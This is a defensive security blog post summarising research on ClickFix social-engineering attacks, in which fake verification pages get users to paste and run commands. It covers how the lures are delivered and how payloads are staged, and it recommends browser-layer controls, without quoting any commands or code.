ClickFix attacks are outpacing endpoint-only defense models

At a glance

What this is: This is a Push Security analysis of how ClickFix pages, delivery methods, and payloads are evolving to bypass traditional phishing and endpoint defenses.

Why it matters: It matters because IAM and security teams need controls that address browser-mediated malicious execution, not just email phishing or host-based malware blocking.

By the numbers:

• ClickFix was the most common initial access method in the last year, accounting for 47% of attacks.

👉 Read Push Security's analysis of advanced ClickFix attacks and browser-based payload delivery

Context

ClickFix is a social engineering pattern that tricks users into pasting and running malicious commands under the guise of a verification step. The security gap is not only user deception, but the fact that the attack moves execution into the browser and then onto the endpoint, where traditional controls may see too little context too late.

For identity and access teams, the relevant question is whether current defenses assume malicious activity will arrive through email, authentication prompts, or clearly suspicious downloads. This article shows why browser-mediated execution, unmanaged devices, and browser-stored credentials require a broader control model than email-first phishing defenses.

The pattern is especially relevant where organisations rely on EDR alone to catch malicious script execution after the user has already initiated it. That starting point is increasingly typical, not exceptional.

Key questions

Q: How should security teams stop ClickFix attacks before the user reaches the endpoint?

A: Teams should focus on browser-layer controls that detect suspicious paste events, fake verification pages, and malicious command prompts before execution begins. That approach reduces dependence on EDR alone and gives defenders a chance to intervene before the user runs code that the browser and endpoint may interpret as legitimate interaction.

Q: Why do ClickFix attacks bypass many traditional phishing controls?

A: They often arrive through search, malvertising, or compromised websites rather than email, so email-centric filters never see them. Because the lure is delivered in a browser and the code is pasted locally, the attack can evade the security stack that assumes suspicious activity will originate from email attachments or links.

Q: What breaks when endpoint detection is the only control for malicious copy-and-paste attacks?

A: The main failure is timing. Endpoint detection only sees the event after the user has already executed the command, which means the most important trust decision has passed. If the control lacks browser context, it may also misclassify the activity as user-initiated and benign.

Q: What should organisations do when employees use unmanaged devices for web access?

A: They should assume browser telemetry and host enforcement will be incomplete and design for inconsistent coverage. That means prioritising browser-side prevention, tightening access assumptions for sensitive applications, and validating whether BYOD endpoints can be monitored well enough to detect malicious paste-driven execution.

Technical breakdown

How ClickFix lures use browser trust to trigger code execution

ClickFix attacks rely on a deceptive web page that presents a fake verification or bot-check flow, often with visual cues such as timers, embedded video, or device-specific instructions. The user is then prompted to paste or run code, which turns social engineering into local execution. Because the payload is copied through the browser sandbox, many security tools cannot observe the malicious action at the point it matters. Practical implication: treat browser-mediated command execution as a distinct control problem, not just a phishing variant.

Practical implication: add browser-layer detection and policy controls before the command reaches the endpoint.

Why non-email delivery expands the attack surface

The article shows that ClickFix pages are often delivered through Google Search, poisoned results, malvertising, compromised sites, and other non-email paths. That matters because many anti-phishing controls are wired into email security, which leaves an entire detection layer bypassed when the lure arrives elsewhere. Attackers also rotate domains, use bot protection, and heavily obfuscate page content to avoid blocklists and scanners. Practical implication: security monitoring must extend beyond email into search, web, and browser telemetry.

Practical implication: expand detection and monitoring beyond email to search, web, and browser channels.

How payload staging shifts from script execution to living-off-the-land abuse

Once the user executes the copied content, attackers commonly rely on LOLBINs such as PowerShell or mshta, or on techniques like cache smuggling that stage a malicious file locally without obvious network retrieval. This is dangerous because the initial script often acts as a stager for later payloads, which means the observed event may look routine unless the endpoint control has enough behavioural context. Practical implication: detections must correlate browser, process, and script signals, not just scan for known malware signatures.

Practical implication: correlate browser, process, and script signals to catch staged payload execution.

Threat narrative

Attacker objective: The attacker wants to gain reliable foothold and credential access by converting user trust into executable code and browser-session compromise.

1. Entry begins with a convincing ClickFix page that reaches the victim through search, malvertising, or a compromised web property rather than email.
2. Escalation occurs when the user pastes and runs code in the browser-driven flow, allowing the attacker to execute script or LOLBIN-based staging on the endpoint.
3. Impact follows when the stager delivers malware or harvests browser-stored credentials and cookies, creating access that bypasses traditional phishing-only controls.

Breaches seen in the wild

• Schneider Electric credentials breach — exposed credentials gave attackers access to Schneider Electric Jira, exfiltrating 40GB.
• LiteLLM PyPI package breach — LiteLLM PyPI supply chain attack, credentials stolen from users.

Read our 52 NHI Breaches Analysis report for a comprehensive view of breaches impacting Non-Human Identities including AI Agents.

NHI Mgmt Group analysis

ClickFix is a browser trust failure before it is an endpoint failure. The attack works because users still treat browser prompts and page-based instructions as lower risk than downloads or email attachments. That assumption breaks when the browser itself becomes the delivery and execution layer. The implication is that identity and security programmes must treat browser-mediated action as a first-class control surface.

Endpoint-only interception creates a single point of failure for malicious copy-and-paste attacks. Once code is copied inside the browser sandbox, EDR becomes the last line of defense rather than the primary one. That is a fragile governance model because it assumes the endpoint will see enough context to decide correctly after execution has already begun. Practitioners should regard this as a control-layer gap, not a tuning problem.

Browser execution window: the point at which social engineering crosses into local code execution has become the decisive security boundary. This boundary matters because the attacker no longer needs a traditional attachment or a credential prompt. They need only enough page credibility to induce the user to run the command. Security teams should anchor policy and detection around that transition, not around email alone.

Unmanaged device exposure magnifies the control gap. If employees and contractors can use BYOD endpoints, the organisation may not have consistent telemetry or enforcement when the malicious paste event occurs. That makes browser-layer controls more important, not less, because the trust decision happens before host assurance can help. The practitioner conclusion is that device variability must be assumed, not exceptionalised.

Malicious copy-and-paste attacks expose a governance assumption that user-initiated actions are safe enough to defer to endpoint review. That assumption was designed for workflows where execution follows administrative intent or known automation. It fails when the actor is the user being manipulated in real time by a browser lure, because the security decision arrives after the decisive action. The implication is that the programme must rethink where trust is granted, not merely add another alert.

From our research:

• 85% of organisations lack full visibility into third-party vendors connected via OAuth apps, according to The State of Non-Human Identity Security.
• Only 1 in 4 organisations are already investing in dedicated NHI security capabilities, which leaves most teams relying on general controls rather than identity-specific visibility.
• From our research: If you are building a broader identity control model, start with Ultimate Guide to NHIs , Key Challenges and Risks to map where visibility, privilege, and lifecycle gaps overlap.

What this signals

Browser-mediated execution is now a governance problem, not just a malware problem. Teams that still treat malicious code execution as an endpoint-only issue will keep missing the earliest decision point, which is the browser page that persuades the user to act. The practical signal is whether your controls can see and stop the paste event before it becomes a process on the host.

Copy-and-paste attacks expose a control boundary that current phishing programmes do not cover. If your organisation relies mainly on email security, the attacker can simply move the lure into search and web channels. Security teams should test whether browser telemetry, web filtering, and endpoint response are operating as one detection chain rather than three disconnected tools.

Browser-layer controls help reduce identity risk when credentials and session data are stored in the browser. Once attackers use ClickFix to get a foothold, the real objective often shifts to cookies, tokens, and saved credentials. That makes browser protection relevant to IAM teams as well as endpoint teams, because session compromise can become identity compromise quickly.

For practitioners

• Deploy browser-layer copy-and-paste detection Block or flag suspicious paste events before they reach the endpoint, especially when the page presents verification or bot-check behaviour.
• Expand monitoring beyond email delivery Instrument search, web, and browser telemetry so poisoned search results and malvertising are visible alongside email-based phishing attempts.
• Correlate browser and process signals Join browser activity, script launch, and LOLBIN execution data to distinguish user-driven commands from ordinary admin workflows.
• Assume BYOD gaps in host coverage Review whether unmanaged devices receive the same browser telemetry and policy enforcement as corporate endpoints, then close the coverage gap where they do not.

Key takeaways

• ClickFix turns browser trust into local execution, which is why it succeeds even when users are not explicitly downloading malware.
• The evidence points to a control gap, not a single bad lure: non-email delivery, payload staging, and unmanaged devices all reduce the value of endpoint-only defense.
• Practitioners should move the control boundary upstream into the browser, where paste events and execution prompts can still be intercepted.

Key terms

• ClickFix: A ClickFix attack is a social engineering technique that persuades a user to paste and run malicious code under the guise of a routine verification step. It abuses trust in browser content and user instruction flow, turning a simple interaction into local execution.
• Living-off-the-land binary: A living-off-the-land binary is a legitimate operating system utility that attackers abuse to run code, stage payloads, or evade obvious malware detection. In practice, it lets malicious activity blend into normal administrative behaviour while using tools already present on the endpoint.
• Browser sandbox: A browser sandbox is the constrained execution environment used by web browsers to isolate web content from the underlying device. It improves safety for normal browsing, but it can also hide the malicious context of copy-and-paste actions from security tools that only observe the host.

Deepen your knowledge

NHI governance, agentic AI identity, and machine identity security are core topics in our NHI Foundation Level course, the industry's only accredited NHI security programme. If you are responsible for identity security strategy or NHI governance in your organisation, it is worth exploring.

This post draws on content published by Push Security: breaking down the most sophisticated ClickFix page seen in the wild. Read the original.